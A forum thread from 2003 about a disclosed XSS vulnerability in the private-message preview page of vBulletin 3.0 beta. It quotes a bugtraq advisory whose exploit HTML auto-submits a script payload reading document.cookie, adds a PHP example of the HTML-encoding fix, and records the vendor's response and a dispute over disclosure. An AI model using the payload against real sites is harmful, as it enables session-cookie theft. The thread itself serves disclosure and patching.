XSS Vulnerability

Smirks
Wed 14th May '03, 1:55pm
I tried submitting this in the bugs forum, but I can't for some reason, even though I am a vB license owner.

This was posted on bugtraq this afternoon:

--

------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility.
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
http://www.vbulletin.com/
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I cannot contact the vendor about this issue! No patch is available at the moment;
------------------------------------------------------
Solution;
------------------------------------------------------
HTML encoding, as on the post thread preview page;
------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
<form action="http://[victim]/forum/private.php" method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You can write your own JS codes
var xss = "\"><script>alert(document.cookie)<\/script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>

*You may need to log in first

Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com
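
The advisory's "Solution" line says to HTML-encode the title the way the post thread preview page already does. The PHP below is an added illustration, not vBulletin's code or the reporter's: the function names are hypothetical, and the sample input is the payload from the exploit form above.

```php
<?php
// Added example (not vBulletin's code; function names are hypothetical).
// The "Preview Message" page writes the submitted title back into the
// form's value="..." attribute. Shown raw (the reported bug) and
// HTML-encoded (the fix the advisory asks for).

// Constructed sample input: the attribute-breaking payload from the advisory.
$title = '"><script>alert(document.cookie)</script>';

// Vulnerable pattern: the leading quote of the raw title closes the value
// attribute, and everything after it is rendered as markup.
function render_title_field_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '" />';
}

// Fixed pattern: htmlspecialchars with ENT_QUOTES encodes & < > " and ',
// so the value can never terminate the attribute it sits in. ENT_QUOTES
// is passed explicitly because the injection point is a quoted attribute,
// not element text, and the same helper must also protect single-quoted
// attributes elsewhere in the template.
function render_title_field_safe(string $title): string
{
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $safe . '" />';
}

// Reviewer's check: a correctly encoded field contains exactly one tag.
// Any additional '<' means user input escaped the attribute.
function field_has_single_tag(string $html): bool
{
    return substr_count($html, '<') === 1;
}

echo render_title_field_unsafe($title), "\n";
echo render_title_field_safe($title), "\n";
var_dump(field_has_single_tag(render_title_field_unsafe($title)));
var_dump(field_has_single_tag(render_title_field_safe($title)));
```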

Scott MacVicar
Wed 14th May '03, 1:56pm
You can't submit things directly to the bugs forum; they have to go in the troubleshooting forum.

This was fixed about 20 minutes ago.

Smirks
Wed 14th May '03, 1:58pm
You can't submit things directly to the bugs forum; they have to go in the troubleshooting forum.

This was fixed about 20 minutes ago.
Ahh... that would answer that question, then. Thanks. :)

filburt1
Wed 14th May '03, 2:21pm
Has the fix been applied to the download from the Member's Area?

edit: :o 3.0.0, not 2.3.0, never mind ;)

Steve Machol
Wed 14th May '03, 3:07pm
This was posted on bugtraq this afternoon:
--
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I cannot contact the vendor about this issue! No patch is available at the moment;

Huh? Why can't he contact the vendor? We are always available via our forums and support system. :confused:

freaky
Wed 14th May '03, 3:13pm
I am running an old 3.0 beta from two weeks ago; can I quickpatch it, or do I need to re-upload everything?

Kier
Wed 14th May '03, 3:21pm
My response to BugTraq:

This bug was fixed within ten minutes of our being told about this report.

As for claims that the reporter was unable to contact us, I am rather surprised. We have scoured our support ticket system, which accepts all email for @vbulletin.com, and found nothing; we have all checked our own email and found nothing; so I'm not sure how hard the reporter tried to contact us, in actual fact.

vBulletin 3 is not yet in public beta, so the number of sites affected will be extremely small, and in any case the fixed version is available for those customers who are part of the private beta to download.

Kier Darby
Product Manager, vBulletin

Wayne Luke
Wed 14th May '03, 3:29pm
I am running an old 3.0 beta from two weeks ago; can I quickpatch it, or do I need to re-upload everything?
You should probably re-upload everything because the number of changes made over the last two weeks would make any "quickfix" incompatible with the software you have installed.

One of the conditions to being in the current beta was that you would maintain up-to-date files on your forums for testing.

freaky
Wed 14th May '03, 6:42pm
One of the conditions to being in the current beta was that you would maintain up-to-date files on your forums for testing.

Yeah, I know. My connection has been going up and down, and now I am moving to a different provider. I'll do it this weekend.

Kier
Thu 15th May '03, 6:36am
Got a reply back from the bug reporting person...

Still not sure how he can claim that he was unable to contact us.

Thank you for patching it, but at your site all the contact information is just for your customers; you want a username and password. So how can I try to contact you?

You must put a contact e-mail on your website for this kind of issue.

Also PHPNuke is the same;
when I try to contact them there is no e-mail account on their website. Also when I try to contact admin@phpnuke.org, I get an error msg.

So it's not my fault. Give us an email address for reports.

Thank you;

Surely the public forums would have been an appropriate place to contact us, either by posting a new thread or by sending a private message to one of the site administrators?

Kier Darby

Wayne Luke
Thu 15th May '03, 8:39am
Got a reply back from the bug reporting person...

Still not sure how he can claim that he was unable to contact us.

Or the Contact Us link at the bottom of every page.

Kier
Thu 15th May '03, 9:51am
Hello;
Yes, in fact you are right.

Before you, I had just discovered a vuln. in PHPNuke; after that I tried to inform the PHPNuke vendors, but I could not reach them in any way!

I tried to guess email addresses etc., but I couldn't contact the vendor. All emails came back to me.

After this I found this vuln. in vBulletin and then I tried to find an email address on your website; I joined the community and tried to send a message to the bug section, but it's closed for new posts.

I tried to contact you via support, but you say "you have to be our paid customers! You need login etc."
After all of that I preferred to send this vuln. in public; I didn't think of sending a private message to an admin.

After that I sent an email to the Sitepoint Forums about these and told them to "please report this to vBulletin for me";

I'm a web security manager; I don't get money for these vulns., so I try to help people and other application developers to build more secure applications.

Sorry if my report affected your product's reputation badly. I think vBulletin is one of the most secure PHP apps.

Thank you;
Ferruh Mavituna

Wayne Luke
Thu 15th May '03, 4:09pm
Well, he didn't send an email to SitePoint while I was an employee there, so he must have found it after April 1st.